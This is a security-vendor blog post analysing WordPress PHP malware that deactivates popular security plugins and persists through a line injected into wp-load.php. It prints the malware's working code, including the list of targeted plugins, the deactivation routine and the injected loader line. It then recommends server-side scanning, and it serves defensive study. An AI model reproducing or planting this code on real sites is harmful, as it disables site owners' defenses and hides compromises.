• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

WordPress Malware Disables Security Plugins to Avoid Detection

September 10, 2020Luke Leal

199
SHARES
FacebookTwitterSubscribe

An alarm or monitoring system is a great tool that can be used to improve the security of a home or website, but what if an attacker can easily disable it?

I’ve previously written about malware that reverses security hardening measures enacted either manually by the owner, or through the use of a security plugin installed in WordPress. What attackers may find problematic with reverse security hardening is that a security plugin that monitors files can detect any changes and alert the owner via email notification or within the WordPress dashboard.

Unfortunately, PHP malware exists which solves this problem for the attacker by immediately disabling the most commonly used security plugins and preventing  them from being reactivated in the WordPress dashboard.

Finding & Deactivating Security Plugins

This GIF shows a WordPress installation with a number of activated plugins, four of which are popular security plugins and two non-security plugins. The animation clearly demonstrates how non-security components are unaffected by the PHP malware but the four security plugins are disabled.

Disabling Security Plugins

If a user tries to reactivate one of the disabled security plugins, it will momentarily appear to activate only for the malware to immediately disable it again. This behavior will prevail until the malware is fully removed from the compromised environment, making it more difficult to detect malicious behavior on the website.

How It Works

The malware was found within the malicious file ./wp-includes/IXR/class-IXR-cache.php. It starts by assigning the website’s root directory to DIZIN to help obfuscate loading the core WordPress file wp-load.php:

if ( ! defined( 'DIZIN' ) ) {
    define( 'DIZIN', dirname( __FILE__ ) . '/' );
}
require_once( DIZIN ."../../wp-load.php");
...

The use of require_once to load wp-load.php allows the attacker to use WordPress coding hooks and variables to cleanly disable the security plugins. First, the attacker defines the function findinSecurity which is used later to sort the array containing the plugins.

function findinSecurity($find, $array) {
    foreach ($find as $value) {
        if (in_array($value, $array)) {
            return $value;
        }
    }
}

Another function that the attacker defines is secList which contains an array of the targeted plugins that will be searched for in the existing plugins and disabled.

function secList(){
    $plugins = array(
        "better-wp-security/better-wp-security.php",
        "sucuri-scanner/sucuri.php",
        "wp-security-audit-log/wp-security-audit-log.php",
        "total-security/total-security.php",
        "wp-hide-security-enhancer/wp-hide.php",
        "bulletproof-security/bulletproof-security.php",
        "wp-simple-firewall/icwp-wpsf.php",
        "wp-security-policy/wp-content-security-policy.php",
        "wp-cerber/wp-cerber.php",
        "defender-security/wp-defender.php",
        "security-ninja/security-ninja.php",
        "wordfence/wordfence.php",
        "cwis-antivirus-malware-detected/cwis-antivirus-malware-detected.php",
        "ninjafirewall/ninjafirewall.php",
        "security-antivirus-firewall/index.php");
    return $plugins;
}

The two functions findinSecurity and secList are then used in the main function active_plugins which uses the WordPress hook get_option(‘active_plugins’) to obtain a list of all active plugins from the WordPress database. It then uses findinSecurity along with the list of targeted security plugins from secList to search the active plugins and disable any that are active using the WordPress hook deactivate_plugins.

function active_plugins() {
    $the_plugs = get_option('active_plugins');
    $findinSecurity = findinSecurity( $the_plugs, secList() );
    if(!empty($findinSecurity)){
        if ( !function_exists( 'deactivate_plugins' ) ) {
            require_once DIZIN . '../../wp-admin/includes/plugin.php';
        }
        deactivate_plugins( plugin_basename( findinSecurity( $the_plugs, secList() )));
    }
}
active_plugins();

So, how does the malware automatically disable the targeted security plugins in case anyone should try to reactivate them? It does this by injecting malware into the bottom of the wp-load.php file.

    if(file_exists(ABSPATH . WPINC . '/IXR/class-IXR-cache.php')){
        require_once( ABSPATH . WPINC . '/IXR/class-IXR-cache.php' );
    }

The injection causes wp-load.php to load the malicious file ./wp-includes/IXR/class-IXR-cache.php through the use of require_once. Since wp-load.php is run on every page load on a WordPress website, any reactivated plugins would be easily disabled automatically upon the next page load — regardless of whether it is from the same user or a new visitor on the website’s homepage.

Conclusion & Mitigation Steps

Malware like this clearly demonstrates why it is so important to have a defense in depth security system that is not dependent solely on a plugin.

To help mitigate risk, consider using a server-side scanner that scans the website at the server level. Our server side scanner operates independently of WordPress and can actually be used for most websites, regardless of the software used. In combination with our monitoring service, it will monitor the integrity of your website files and notify you of any changes.

It will also inform you if access to the website’s server should be lost — which can happen if an attacker tries to disable the server-side scanner. It acts as a backup alarm to let you know when your file integrity monitoring has been disabled, so further investigation can be done. The WordPress security plugins do not offer this ability.

199
SHARES
FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, Website Security, WordPress SecurityTags: Black Hat Tactics, Hacked Websites, Obfuscation, WordPress Plugins and Themes

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

2019 Threat Report

WordPress Security Course

The Anatomy of Website Malware Webinar

WordPress Security Guide

How to know you can trust a plugin

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.